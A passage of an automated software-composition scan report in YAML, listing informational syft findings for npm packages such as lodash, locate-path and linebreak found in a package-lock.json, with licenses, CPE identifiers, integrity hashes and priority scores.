id: 8108350690a84b91
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: linebreak 1.1.0'
|
|
title: linebreak 1.1.0
|
|
description: 'Package discovered: linebreak 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 17b9850959841637
|
|
name: linebreak
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:linebreak:linebreak:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/linebreak@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/linebreak/-/linebreak-1.1.0.tgz
|
|
integrity: sha512-MHp03UImeVhB7XZtjd0E4n6+3xr5Dq/9xI/5FptGk5FrbDR3zagPa2DS6U8ks/3HjbKWG9Q1M2ufOzxV2qLYSQ==
|
|
dependencies:
|
|
base64-js: 0.0.8
|
|
unicode-trie: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6d22d8e100269548
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lines-and-columns 1.2.4'
|
|
title: lines-and-columns 1.2.4
|
|
description: 'Package discovered: lines-and-columns 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2f4d4f332c0f6687
|
|
name: lines-and-columns
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lines-and-columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines-and-columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines_and_columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines_and_columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines-and:lines-and-columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines-and:lines_and_columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines_and:lines-and-columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines_and:lines_and_columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines:lines-and-columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lines:lines_and_columns:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lines-and-columns@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz
|
|
integrity: sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 99a30188145ce555
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: locate-path 5.0.0'
|
|
title: locate-path 5.0.0
|
|
description: 'Package discovered: locate-path 5.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e6b383b17df8c845
|
|
name: locate-path
|
|
version: 5.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:locate-path:locate-path:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:locate-path:locate_path:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:locate_path:locate-path:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:locate_path:locate_path:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:locate:locate-path:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:locate:locate_path:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/locate-path@5.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz
|
|
integrity: sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==
|
|
dependencies:
|
|
p-locate: ^4.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4752919bcee27237
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash 4.18.1'
|
|
title: lodash 4.18.1
|
|
description: 'Package discovered: lodash 4.18.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ac9c211256bf6980
|
|
name: lodash
|
|
version: 4.18.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash:lodash:4.18.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/lodash@4.18.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz
|
|
integrity: sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 89713df98a2beb75
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.camelcase 4.3.0'
|
|
title: lodash.camelcase 4.3.0
|
|
description: 'Package discovered: lodash.camelcase 4.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a5b985768ef9b9f6
|
|
name: lodash.camelcase
|
|
version: 4.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.camelcase:lodash.camelcase:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.camelcase@4.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz
|
|
integrity: sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4b1d67018d50050d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.clonedeep 4.5.0'
|
|
title: lodash.clonedeep 4.5.0
|
|
description: 'Package discovered: lodash.clonedeep 4.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1fdd3c59e36d5b0f
|
|
name: lodash.clonedeep
|
|
version: 4.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.clonedeep:lodash.clonedeep:4.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.clonedeep@4.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz
|
|
integrity: sha512-H5ZhCF25riFd9uB5UCkVKo61m3S/xZk1x4wA6yp/L3RFP6Z/eHH1ymQcGLo7J3GMPfm0V/7m1tryHuGVxpqEBQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6ee3a377a52860b5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.defaults 4.2.0'
|
|
title: lodash.defaults 4.2.0
|
|
description: 'Package discovered: lodash.defaults 4.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 59a8c664dfef6c46
|
|
name: lodash.defaults
|
|
version: 4.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.defaults:lodash.defaults:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.defaults@4.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz
|
|
integrity: sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a3b4683fdc629aef
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.includes 4.3.0'
|
|
title: lodash.includes 4.3.0
|
|
description: 'Package discovered: lodash.includes 4.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: aa93a44741b08e66
|
|
name: lodash.includes
|
|
version: 4.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.includes:lodash.includes:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.includes@4.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz
|
|
integrity: sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c512306c360b6fda
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.isarguments 3.1.0'
|
|
title: lodash.isarguments 3.1.0
|
|
description: 'Package discovered: lodash.isarguments 3.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c84bded77fb6b828
|
|
name: lodash.isarguments
|
|
version: 3.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.isarguments:lodash.isarguments:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.isarguments@3.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz
|
|
integrity: sha512-chi4NHZlZqZD18a0imDHnZPrDeBbTtVN7GXMwuGdRH9qotxAjYs3aVLKc7zNOG9eddR5Ksd8rvFEBc9SsggPpg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f0317f2d62f56421
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.isboolean 3.0.3'
|
|
title: lodash.isboolean 3.0.3
|
|
description: 'Package discovered: lodash.isboolean 3.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: df154b64f7d4588a
|
|
name: lodash.isboolean
|
|
version: 3.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.isboolean:lodash.isboolean:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.isboolean@3.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz
|
|
integrity: sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2ae1d391a80c5a72
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.isinteger 4.0.4'
|
|
title: lodash.isinteger 4.0.4
|
|
description: 'Package discovered: lodash.isinteger 4.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e92c8ae8d8c83e78
|
|
name: lodash.isinteger
|
|
version: 4.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.isinteger:lodash.isinteger:4.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.isinteger@4.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz
|
|
integrity: sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0e12d10e43707e74
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.isnumber 3.0.3'
|
|
title: lodash.isnumber 3.0.3
|
|
description: 'Package discovered: lodash.isnumber 3.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 32689628126e866e
|
|
name: lodash.isnumber
|
|
version: 3.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.isnumber:lodash.isnumber:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.isnumber@3.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz
|
|
integrity: sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f1231b7e60dd673c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.isplainobject 4.0.6'
|
|
title: lodash.isplainobject 4.0.6
|
|
description: 'Package discovered: lodash.isplainobject 4.0.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a6b14f73240e0d01
|
|
name: lodash.isplainobject
|
|
version: 4.0.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.isplainobject:lodash.isplainobject:4.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.isplainobject@4.0.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz
|
|
integrity: sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1ec5aad22a5b316a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.isstring 4.0.1'
|
|
title: lodash.isstring 4.0.1
|
|
description: 'Package discovered: lodash.isstring 4.0.1'
|
|
remediation: Track and scan dependencies.
|
